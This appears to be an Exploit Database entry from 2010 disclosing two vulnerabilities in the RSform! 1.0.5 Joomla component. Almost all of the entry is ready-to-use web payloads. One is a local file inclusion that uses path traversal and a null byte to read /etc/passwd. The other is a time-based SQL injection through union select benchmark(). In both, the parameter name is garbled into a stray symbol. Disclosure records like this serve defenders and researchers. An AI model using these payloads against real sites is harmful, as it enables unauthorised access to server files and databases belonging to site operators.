RSform! 1.0.5 (Joomla) Multiple Vulnerabilities



EDB-ID: 15443 CVE: N/A OSVDB-ID: 69069
Author: jdc Published: 2010-11-06 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
# Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
# Date: 06.11.2010
# Author: jdc
# Software Link: 
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265
# Version: 1.0.5

Local File Include
------------------
?option=com_forme
〈=../../../../../../../../../etc/passwd%00

SQL Injection
-------------
?option=com_forme
〈=-1' union select benchmark(1000000,md5(1)) -- '

NOTE: RSform! Pro is not affected...

6 Nov 2010
jdc